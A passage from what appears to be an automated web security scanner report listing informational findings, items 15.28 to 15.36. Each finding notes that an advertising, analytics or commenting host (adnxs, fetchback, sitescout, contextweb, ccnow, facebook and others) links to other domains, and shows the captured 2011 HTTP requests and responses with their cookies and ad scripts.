Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; sess=1; uuid2=2724386019227846218; icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgBIAEoATCm55_uBBCm55_uBBgB

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:03:50 GMT
Content-Length: 530

<script language="JavaScript" src="http://mf.sitescout.com/tag.jsp?pid=0C66F16&w=728&h=90&rnd=1304949670&cm=http://ib.adnxs.com/click/6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAcCffIAAAAAA./cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc="></script>
15.28. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ptj?member=311&inv_code=cm.tribune&size=300x600&imp_id=cm-87971011_1304949578,11f8f328940989e&referrer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.tribune%2Fuscell_ldev_300x600_05311%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.{PRICEBUCKET}-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3Bord%3D5044004%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#-r-98m2jrr-%SN'CJQE2F!)VKr0:$5r$<o/e@)WesS%k+n*I('YxYT*<N@6F+c(io$N-%L1@9'b[5(:jB-9V[OUYy9.R5e[ytcpQ`bMH@TW6X$3_sCR$6Xedk-G'TDF.mC`)B_N$6LQR^Q1gg.MkA)P$tfA)DWsB'hbJ<Zo?BY+A8^^2)oHZ5mIqhtj<v4iwpkyYITX547eLID>>z*PI7v'je[t@sbTLvZL[5/^@u)U'+YE]A*I/WjMFL7TH)6(3+$CLIE.`Q02p!/Bh8LJdJMOI#teJcaJ2gAxMkoDkRfC>:upDX3r@Xk!*_O@<)?o7FEG#?s@>3rsZ:NP+SZwInEb8?uR<<.1bW>zC'DHc(RjR_5cV/>hV4<.Ep_Brg%LYIKnl%jfU4H4E7-mJZW+LULZ/rSrz3JC#MNpp09cPRI)3/W$VKQg4AB[7:`laDI'0.])0*DP]MTFF+TEc'nRbjb[T9R5j$WfUnk:l:dTEaTSKXEV/XvsO=)MPZ#H-A8'm1SbZ-hlwo/uIEE1WKi>%cMg!FYc3gk*_!.KhjIbfv>n6icJz]`pNnloA:BN7K@E`FgYF*-qn0v`vWZ1n

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-YMBEAoYASABKAEwzOaf7gQQzOaf7gQYAA..; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ%E]*wn6#L)u[/9vF(#Y0hCyOq4zX.]@%YeDfOm%>H*7YB.%bEM]y->w8KvAo2=dOe[sU:l.T_/[NYl(2Eh>8Xvm?rd_r=>@v12n1PPr83x.yt9kLh`*HT%BGdWyHjK6f0cX7I[xMnk2l%9TDEFPbl>j#IWjYmS?2Slf#n2GlZ?NtukNevrCBvNv$/LeQb#NWY6#p?5Iu_J$i)=dJF%'fnWsjMXB<Asu#1y3xlChN'hH`mL%?2OPWu4C5'7Q:h(JfD(sdhR.k05YkrZhE:rjV(mIlaW+!0co/_ZL*i)<k1)OMwY=fQs2/?WvG99-nO6Z+uf@aoxi@q`Kpcu'mnyC_.Lkbk-f#OOUe<q.80]f[@i1ga+uzgRuJ$'bbRz!=-@wnl$(Rx5Htg)4_GEmX>8j%0wr@pc*n6nSnSFrzhz/1Vt7obj(Fj#<8xba6Nf94EPZmt6turO7C<00`E$Kx1gBKW-'n(.0)'[-r%'(8>+t=kBU92d^_ZgS'^q6A:q-s]UkdZGZ9<vX!u1FsK@GgtGyJHdlIU:WFV/!Z_7='J9^-KvkXh*lzRgL33)!PQ!odnpnaw$jg1t]wZM+J$n!lhf)z]`%I4TZ`kCG1; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 13:59:40 GMT
Content-Length: 618

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.tribune/uscell_ldev_300x600_05311;net=cm;u=,cm-87971011_1304949578,11f8f328940989e,ent,ax.-cm.ent_l-cm.music_h-ti
...[SNIP]...
</scr'+'ipt>');document.write('<img src="http://view.atdmt.com/ADO/view/278612728/direct;wi.1;hi.1/01" width="1" height="1"/>');
15.29. http://imp.fetchback.com/serve/fb/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /serve/fb/imp?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304949669_29807:59535:1:0_29802:59536:1:588698_29805:59534:1:589359; kwd=1_1304949669_12936:254607_11317:1206401_11717:1206401_11718:1206401_11719:1206401; scg=1_1304949669; ppd=1_1304949669; uid=1_1304949672_1303179323923:6792170478871670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:14 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1304949674_29805:59534:2:0_29807:59535:1:5_29802:59536:1:588703; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: uid=1_1304949674_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: kwd=1_1304949674_12936:254612_11317:1206406_11717:1206406_11718:1206406_11719:1206406; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: scg=1_1304949674; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: ppd=1_1304949674; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:14 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10433

<style type="text/css">body {margin: 0px; padding: 0px;}</style>
<a href="http://imp.fetchback.com/serve/fb/overlay?8945eae51d9a2c8e4a5ff0a7577d8283a6c350af96ce36b3985a1944046ffd99d3a4259f239ce6c8683e
...[SNIP]...
<div id="myAlternativeContent">
           <a href="http://www.adobe.com/go/getflashplayer">
               <img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" />
           </a>
...[SNIP]...
15.30. http://media.adfrontiers.com/pq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.adfrontiers.com
Path:   /pq

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pq?t=f&s=923&ts=1304949604772&cm=1148&ac=5&at=1&xvk=60302672.07185271&fd=t&tc=1&rr=t HTTP/1.1
Host: media.adfrontiers.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tc=1; af="3|!RglRcjj3oVAzGl,hfn!gk!!77,-1066|3142|618|1|1304340985980|26|3|0:349|2477|618|1|1304340397914|26|3|0:349|1148|1484|1|1304949604776|25|2|0:-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private, no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 01 Jan 2000 00:00:00 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: af="3|!RglRcjj3oVAzGl,hfn!gk!!77,-1066|3142|618|1|1304340985980|26|3|0:349|2477|618|1|1304340397914|26|3|0:349|1148|1484|1|1304949604776|25|2|0:-"; Version=1; Domain=media.adfrontiers.com; Max-Age=2592000; Path=/
Content-Type: text/html
Content-Length: 771
Date: Mon, 09 May 2011 14:00:09 GMT
Connection: close

<html><head>
<title>Adv.com 2010 - FCap 3/24 728x90</title>
</head><body marginwidth=0 marginheight=0 leftmargin=0 topmargin=0 style="background-color:transparent">
<script type='text/javascript'>
v
...[SNIP]...
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
<a href="http://www.quantcast.com/p-eb7mHCSsqWKbY" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-eb7mHCSsqWKbY.gif" style="display: none" border="0" height="1"

width="1" alt="Quantcast"/></a>
...[SNIP]...
15.31. http://mediacdn.disqus.com/1304703476/build/system/disqus.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1304703476/build/system/disqus.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /1304703476/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1304526991.8.8.utmcsr=news.techworld.com|utmccn=(referral)|utmcmd=referral|utmcct=/personal-tech/3277379/x-factor-contestants-warned-after-250000-data-breach/; __utma=113869458.1602204697.1303349184.1304359650.1304526991.8

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 07 May 2011 00:13:15 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: application/javascript
Vary: Accept-Encoding
X-Varnish: 2794956330 2794955461
Cache-Control: max-age=2371001
Expires: Mon, 06 Jun 2011 00:37:40 GMT
Date: Mon, 09 May 2011 14:00:59 GMT
Connection: close
Content-Length: 188344

DISQUS.dtpl=(function(){var b={version:"0.2",author:"Anton Kovalyov <anton@disqus.com>"};b.getGuestFields=function(g){function f(h){return DISQUS.nodes.get("#"+h+(g?"-"+g:""))}return{name:f("dsq-field
...[SNIP]...
<span class="dsq-mention dsq-tt dsq-mention-twitter"original-title="Expand @'+w+'\'s profile" data-dsq-username="'+w+'" data-dsq-remote="twitter"><a class="twitter-account" href="http://twitter.com/'+w+'" onclick="window.open(\''+u+"', 'Twitter Mention', 'height=420, width=550');return false;\">@"+w+"</a>
...[SNIP]...
15.32. http://mf.sitescout.com/disp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /disp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /disp?pid=0C66F16&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2FXHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2syT9cctwpHazJP0YIgIiop3FfSsYda6b2ziWz88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAmA8AAQMCAAUAAAAANyNUQgAAAAA.%2Fcnd%3D%21Wx_b0wjC6AIQo6ULGAAg8dUBKAAxXXLcKR2syT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-ELG5AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC%2Freferrer%3Dhttp%253A%252F%252Fwww.thevine.com.au%2Fclickenc%3D&rand=75602591 HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=XHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2syT9cctwpHazJP0YIgIiop3FfSsYda6b2ziWz88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAmA8AAgMCAAUAAAAAOCNlQgAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949676%29%3Buf%28%27r%27%2C+184995%2C+1304949676%29%3B&cnd=!Wx_b0wjC6AIQo6ULGAAg8dUBKAAxXXLcKR2syT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-ELG5AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
SAdBuild: 400
P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 6515
Date: Mon, 09 May 2011 14:01:29 GMT


<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="Tue, 01 Jan 2000 12:12:12 GMT">

...[SNIP]...
<span class="tadShadow">
<img src="http://mediaforce.sitescout.netdna-cdn.com/ad150-c157549.jpg" alt="SHOCKING: $9 Car Insurance in TX"/>
   </span>
...[SNIP]...
<span class="tadShadow">
<img src="http://mediaforce.sitescout.netdna-cdn.com/ad211-8e8041f.jpg" alt="New Policy in Texas"/>
   </span>
...[SNIP]...
15.33. http://tag.contextweb.com/TagPublish/getad.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=536156&ct=101378&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&mrnd=74482871&if=0&tl=1&pxy=0,0&cxy=1050,3575&dxy=1050,3575&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB23
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2555
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:02 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv; domain=.contextweb.com; expires=Wed, 09-May-2012 14:00:02 GMT; path=/
Set-Cookie: 536156_4_101378=1304949602182; domain=.contextweb.com; path=/
Set-Cookie: cr=2|1|-8588966416881931568|1%0a15|1|-8588960524833886248|1; domain=.contextweb.com; expires=Thu, 03-May-2012 14:00:02 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Tue, 10-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script src="http://tag.admeld.com/passback/js/610/gannett/728x90/8/meld.js"></scr'+'ipt>\n'
;
document.write(strCreative);var strCreative=''
+ '<iframe src="http://bh.context
...[SNIP]...
15.34. http://www.ccnow.com/cgi-local/cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccnow.com
Path:   /cgi-local/cart.cgi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi-local/cart.cgi?2akrshop2_AKR074VINYL HTTP/1.1
Host: www.ccnow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.5.10.1304949980; oudelay=1304950305; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206;

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:12:25 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950348; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:12:28 GMT
Set-Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75AC132BC7478C7307DEBD3D97FA4A6E72CA22BF32FAF94F13; domain=www.ccnow.com; path=/; expires=Wed, 08-May-2013 14:12:28 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
15.35. http://www.ccnow.com/cgi-local/sc_cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccnow.com
Path:   /cgi-local/sc_cart.cgi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi-local/sc_cart.cgi?8147444662139294 HTTP/1.1
Host: www.ccnow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:30 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950050; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:30 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
15.36. http://www.facebook.com/plugins/comments.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/comments.php?api_key=158577044196953&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6000e528%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527&locale=en_GB&numposts=10&sdk=joey&width=620 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
